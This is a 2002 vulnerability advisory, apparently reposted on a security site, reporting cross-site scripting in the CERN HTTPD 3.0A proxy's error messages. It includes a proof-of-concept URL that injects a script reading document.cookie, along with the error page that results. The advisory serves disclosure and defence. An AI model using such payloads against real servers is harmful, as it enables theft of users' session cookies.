Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Proxy error messages crossite scripting

  W3C Jigsaw Proxy Server: Cross-Site Scripting Vulnerability (REPOST)

  Re: Squid doesn't quote urls in error messages.

  Squid doesn't quote urls in error messages.

From:TAKAGI, Hiromitsu <takagi.hiromitsu_(at)_aist.go.jp>
Date:16.08.2002
Subject:CERN Proxy Server: Cross-Site Scripting Vulnerability

CERN Proxy Server: Cross-Site Scripting Vulnerability
=====================================================

Affected:
 CERN HTTPD 3.0A
 http://www.w3.org/Daemon/Activity.html
 
Vendor Status:
 CERN httpd team (httpd@w3.org) was notified on Aug 10, 2001 but
 they did not respond.

Exploit:

http://nonexistenthost.google.com/<SCRIPT>document.write(document.
cookie)</SCRIPT>

 ========================================================
 <HTML>
 <HEAD>
 <TITLE>Error Message</TITLE>
 </HEAD>
 <BODY>
 <H1>Fatal Error 500</H1>
 Can't Access Document:
http://nonexistenthost.google.com/<SCRIPT>document.write(document.
cookie)</SCRIPT>.
 <P>
 <B>Reason:</B> Can't locate remote host:  nonexistenthost.google.com.
 <P>
...snip...
 ========================================================

 Similar problems have been found in Proxomitron Naoko-4 BetaFour,
 Microsoft ISA Server and Squid 2.4 DEVEL4.
 <http://www.securityfocus.com/bid/3087>
 <http://www.microsoft.com/technet/security/bulletin/MS01-045.asp>
 <http://www.securityfocus.com/archive/1/197606>


Best regards,
--
Hiromitsu Takagi
http://staff.aist.go.jp/takagi.hiromitsu/

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru
test server